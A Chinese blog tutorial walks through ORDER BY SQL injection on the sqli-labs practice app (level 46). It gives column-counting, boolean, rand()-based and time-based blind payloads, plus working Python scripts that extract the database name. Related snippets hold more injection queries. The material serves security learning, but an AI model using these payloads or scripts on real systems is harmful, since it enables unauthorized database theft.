SQL注入之ORDER BY注入_order by sql注入问题

最新推荐文章于 2024-07-19 17:34:15 发布
最新推荐文章于 2024-07-19 17:34:15 发布
阅读量798 收藏 10
点赞数 7
分类专栏: 程序员 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84970069/article/details/138778046
版权

这里使用sqllabs的第46关,展示如下注入方式

1.利用order by子句快速猜解表中的列数配合union进行联合查询

使用union进行联合查询要保证前面和后面的查询列数一致所以,在用union之前,要判断列数是多少,payload很简单就是order by后面跟上数字就好,那么就可以通过group by二分法测试具体步骤步骤如下:

  1. 尝试一个较大的数字(例如,10)作为GROUP BY的参数,观察页面的响应。
  2. 如果报错,表示选择的列数过多,需要减小数字。
  3. 通过逐步减小数字,直到不再报错为止。
  4. 确定的数字即为正确的列数。

2.基于布尔的盲注(数字型)

只有order=$id,数字型注入时才能生效,如果是order ='$id'我们输入的语句被转化为字符串,功能失效演示如下:
在这里插入图片描述
如上可以看出字符串型时if(***)被转化为字符串导致失效,排列顺序不改变而数字型时排列顺序改变

知道列名的情况

根据列名构造payload如下:

order by if(ascii(substr((select database()),1,1))>110,id,password)

分析一下,首先(select database())获取当前数据库的名称,然后使用substr()提取第一个字符接着ascii()将这个字符转为ASCII值然后判断ASCII值是否大于110,true时根据id排序,false时根据username排序,这样我们就把这个字母的信息获取到了,下面使用python编写脚本:

import requests
from bs4 import BeautifulSoup


def Boolean\_injection(url):
    name = ''
    for i in range(1, 100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "if(ascii(substr((select database()),%d,1))>%d,id,password)" % (i, mid)
            params = {"sort": payload}
            # 获取HTML文档
            html_doc = requests.get(url, params=params).text

            # 创建BeautifulSoup对象
            soup = BeautifulSoup(html_doc, 'html.parser')

            # 找到所有行(<tr>)元素
            rows = soup.find_all('tr')
            # 遍历每一行,并提取每个单元格的文本内容
            cell_contents = []
            for row in rows:
                cells = row.find_all('td')
                cell_texts = [cell.text for cell in cells]
                cell_contents.append(cell_texts)
            # 清除第一个元素
            del cell_contents[0]
            # 获取id列
            id_cell = []
            for row in cell_contents:
                id_cell.append(row[0])

            if id_cell == sorted(id_cell):
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
        print(name)

if __name__ == "\_\_main\_\_":
    url = 'http://127.0.0.1:8080/Less-46/'# 换成你自己的网址
    Boolean_injection(url)
不知道列名的情况

虽然我们不知道列名但是id总应该有吧那么不妨这样构造payload:

order by if (ascii(substr((select database()),1,1))>110,1,(select id from information_schema.tables))

这样当ASCII值是否大于110为true时就会正常返回界面,false时会报ERROR 1242 (21000): Subquery returns more than 1 row的错误,如果没有回显错误信息页面也没有关系,因为内容为空也可以作为一个布尔条件,python脚本如下:

import requests
from bs4 import BeautifulSoup


def Boolean\_injection(url):
    name = ''
    for i in range(1, 100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "if (ascii(substr((select database()),%d,1))>%d,1,(select id from information\_schema.tables))" % (i, mid)
            params = {"sort": payload}
            # 获取HTML文档
            html_doc = requests.get(url, params=params).text         
            if 'Subquery returns more than 1 row' in html_doc:
                # low = mid + 1
                high = mid
            else:
                low = mid + 1
                # high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
    print(name)

if __name__ == "\_\_main\_\_":
    url = 'http://127.0.0.1:8080/Less-46/'# 换成你自己的网址
    Boolean_injection(url)
采用rand()函数盲注

rand() 函数用于生成介于0和1之间的伪随机数。当你提供一个种子作为参数给 rand() 函数时,它会使用这个种子来初始化伪随机数生成器,并且对于相同的种子,将会生成相同的随机数序列,那么我就可以构造这样的payload:

order by rand(ascii(substr((select database()),1,1))>110)

同样的当ascii(substr((select database()),1,1))>110为true或者false时,排序结果是不同的,但因为序列相同所以就可以使用rand()函数进行盲注了。python脚本如下:

import requests
from bs4 import BeautifulSoup


def Boolean\_injection(url):
    name = ''
    for i in range(1, 100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "rand(ascii(substr((select database()),%d,1))>%d)" % (i, mid)
            params = {"sort": payload}
            # 获取HTML文档
            html_doc = requests.get(url, params=params).text
            # 创建BeautifulSoup对象
            soup = BeautifulSoup(html_doc, 'html.parser')
            # 找到所有行(<tr>)元素
            rows = soup.find_all('tr')
            # 遍历每一行,并提取每个单元格的文本内容
            cell_contents = []
            for row in rows:
                cells = row.find_all('td')
                cell_texts = [cell.text for cell in cells]
                cell_contents.append(cell_texts)
            # 清除第一个元素
            del cell_contents[0]
            # 获取id列
            id_cell = []
            for row in cell_contents:
                id_cell.append(row[0])
            if id_cell == ['5', '4', '3', '8', '1', '7', '2', '6']:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
        print(name)

if __name__ == "\_\_main\_\_":
    url = 'http://127.0.0.1:8080/Less-46/'# 换成你自己的网址
    Boolean_injection(url)

3.基于时间的盲注

时间盲注和布尔盲注类似只是将布尔条件改为延迟的时间,构造payload:

order by if(ascii(substr((select database()),1,1))>110,1,sleep(1))

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

28)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84970069
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql order by注入_sql注入order by注入
weixin_28882177的博客
01-19 4777
0x00 前言夜里看了一篇文章,突然有了启发,赶紧记录一下。了解order by参考:order by是mysql中对查询数据进行排序的方法, 使用示例select * from 表名 order by 列名(或者数字) asc;升序(默认升序)select * from 表名 order by 列名(或者数字) desc;降序这里的重点在于order by后既可以填列名或者是一个数字。举个例子:...
sql注入讲解ppt.pptx
08-10
3. ORDER BY:使用 ORDER BY keyword 来排序查询结果。 4. LIMIT 和 OFFSET:使用 LIMIT 和 OFFSET keyword 来限制查询结果。 八、SQL 注入基本步骤: 1. 注入点测试:检测 SQL 注入的可能性。 2. 查询字段数:...
sql注入之布尔盲注
weixin_45653478的博客
04-09 1413
id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))=117 --+ 爆的i。例如:substr(abcd,1,1) 从第一位开始(也就是从a开始)截取一个字符,就是a。substr(abcd,2,1) 从第二位开始,截取一个字符,就是b。抓包并发送intruder。设置多个payload集合。
mysql order by布尔盲注
CvtNhso的博客
02-26 355
在MySQL支持使用ORDER BY语句对查询结果集进行排序处理,使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下select * from 表名 order by 列名(或者数字) asc;升序(默认升序)select * from 表名 order by 列名(或者数字) desc;降序使用sqli-labs-php7-master环境在第46关查看源码及打开网页源代码color:#FFF;php?
Sql server注入分类之盲注(布尔-时间-OOB)
qq_42990434的博客
12-16 2277
本章目录:布尔盲注第一步 判断注入第二步 猜解列数第三步 猜数据库名,表名:第四步 猜解字段第五步 判断字段长度第六步 猜解字段内容时间盲注利用条件注入语句OOB 注入利用条件原理检测利用/渗出 布尔盲注 总结: 布尔盲注就是靠逐个猜测与尝试弱口令的的方法,有报错的就是猜错了,没报错就对了。 第一步 判断注入 and 1=1 and 1=2 第二步 猜解列数 order by 1 #返回正确 order by 2 #返回正确 order by 3 #抛出错误 第三步 猜数据
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
Like-and-OrderBy.rar_sql like order by
09-23
SQL语言中,LIKE和ORDER BY是两个非常重要的关键字,它们分别用于数据的查询和排序。今天我们将深入探讨这两个概念,以及它们在T-SQL(Transact-SQL,微软SQL Server中的SQL方言)中的具体应用。 首先,我们来...
sql注入之手工注入示例详解
09-10
例如,如果在`order by 4`时出现问题,那么字段数就是3。 **得到显示位**: 一旦知道字段数,就可以判断哪些字段在页面上显示。使用`UNION SELECT`语句,结合数字测试,如`...
SQL-ORDER BY 多字段排序(升序、降序)
12-15
在实际操作中,`ORDER BY`常与其他SQL子句(如`GROUP BY`, `JOIN`等)结合使用,以满足复杂的数据查询需求。通过理解并熟练掌握`ORDER BY`多字段排序,可以更好地对数据库中的数据进行管理和分析。 总之,`ORDER BY...
sqlmap sql 注入测试工具
03-06
- 技术细节:SQLMap会尝试各种注入技术,包括但不限于ORDER BY注入、UNION SELECT注入、堆叠查询注入等,以找到最有效的注入点。 4. 安全测试流程: - 预备阶段:了解目标网站的结构,确定可能的注入点。 - 扫描...
PostgreSQL 中如何解决因大量并发删除和插入操作导致的索引抖动?
技术笔记
07-17 834
索引抖动是 PostgreSQL 中一个常见的问题,它会对数据库的性能产生严重的影响。通过采用批量操作、分区表、索引优化和调整数据库参数等方法,我们可以有效地解决索引抖动问题,提高数据库的性能和稳定性。在实际应用中,我们应该根据具体情况选择合适的解决方案,并不断地进行优化和调整,以满足业务的需求。解决索引抖动问题就像是一场战斗,我们需要根据敌人(问题)的特点和弱点,选择合适的武器(解决方案),并灵活运用战术(优化方法),才能取得最终的胜利。
PostgreSQL异常:An I/O error occurred while sending to the backend
IT后浪的博客
07-19 264
在使用PostgreSQL数据库批量写入数据的时候,遇到了一个问题,异常内容如下:Cause: org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
SQL Server设置定时作业调度Schedule
Cachel Wood的博客
07-15 391
在“步骤”选项卡中,单击“新建”按钮,然后输入步骤的名称和描述。在“计划”选项卡中,单击“新建”按钮来创建一个新的计划。代理将在指定的时间和频率下运行作业,并执行您定义的。右键单击“作业”文件夹,然后选择“新建作业”。在“作业属性”对话框中,输入作业的名称和描述。代理的功能,可以用来设置定时作业。在“命令”文本框中,输入要定期执行的。现在,您已经成功设置了一个定时作业。连接到要设置定时作业的数据库实例。设置每天早上八点执行这个定时任务。在对象资源管理器中,展开“
SQL执行流程、SQL执行计划、SQL优化
最新发布
风中的默默
07-19 144
返回两个表中的匹配行。返回左表中的所有记录以及右表中的匹配记录。返回右表中的所有记录以及左表中的匹配记录。返回左侧或右侧表中有匹配的所有记录。
【MySQL】根据binlog日志获取回滚sql的一个开发思路
weixin_45385457的博客
07-19 238
不同客户端之间会交替追加在 binlog 中,需要通过 👆的 binlog 匹配流程来控制匹配。行,需要再次寻找 thread_id 相同的行,匹配到后执行上一个流程。在 binlog 中的线程 ID 记录为 thread_id。一个线程执行多个 sql 回滚到同一个文件可能带来的问题。对应 binlog 日志中的 thread_id=指定 mysql 客户端 开始时间和结束时间。打开 mysql 客户端 开始时间。关闭 mysql 客户端 结束时间。先匹配 thread_id 相同的。
SQL Server详细使用教程(包含启动SQL server服务、建立数据库、建表的详细操作) 非常适合初学者
hackeroink的博客
07-15 1056
本文主要详细介绍SQL server2019的简单使用,以《数据库系统概论(第5版)》的第79页—第80页为例,详细介绍如何使用SQL server2019这款数据库软件,包括启动SQL server服务,建立数据库(学生—课程模式S-T),建立课程表等,内容比较简单,容易理解,适合广大初学者了解SQL server的简单使用。不会涉及到复杂的语法知识,如果有也会详细解释的!下文标红的字请重点关注一下!本文的需要建表的数据如下:2.Course课程号Cno课程名Cname先行课Cpno学分。
PostgreSQL 中如何解决因大量并发插入导致的主键冲突?
技术笔记
07-16 980
在 PostgreSQL 中,解决因大量并发插入导致的主键冲突问题是一个重要的任务。我们可以通过使用唯一索引、序列、批量插入与事务处理、分区表和优化业务逻辑等方法来避免主键冲突的发生。这些方法各有优缺点,我们需要根据实际情况选择合适的解决方案。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
怎样在 PostgreSQL 中实现数据的异地备份?
技术笔记
07-19 858
总而言之,在 PostgreSQL 中实现数据的异地备份不是一件难事,但也需要我们认真对待,精心规划。选择合适的备份方法和异地存储方式,制定合理的备份策略,定期进行测试和恢复演练,才能确保我们的数据在任何情况下都能“安然无恙”。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
sql注入order by猜列数问题
06-01
好的,您的问题是关于SQL注入order by猜列数问题。这是一种常见的SQL注入攻击方式,攻击者试图通过在order by语句中输入不同的值来猜测查询结果集中的列数。 一种常见的猜测列数的方法是使用union select语句,例如: ``` SELECT column1, column2, column3 FROM table1 ORDER BY 1 ``` 攻击者可以通过union select语句来猜测列数: ``` SELECT column1, column2, column3 FROM table1 WHERE 1=2 UNION SELECT NULL, NULL, NULL, NULL ORDER BY 1,2,3,4 ``` 如果查询结果集的列数为3,则上述语句将返回一个空行,并且order by子句将根据第一、第二和第三列进行排序。如果查询结果集的列数为4,则该语句将返回一个错误,因为第二个查询中的列数与第一个查询中的列数不匹配。 总之,攻击者可以使用union select语句和order by子句来猜测查询结果集中的列数。为了避免这种攻击,您应该使用参数化查询和输入验证来保护您的应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值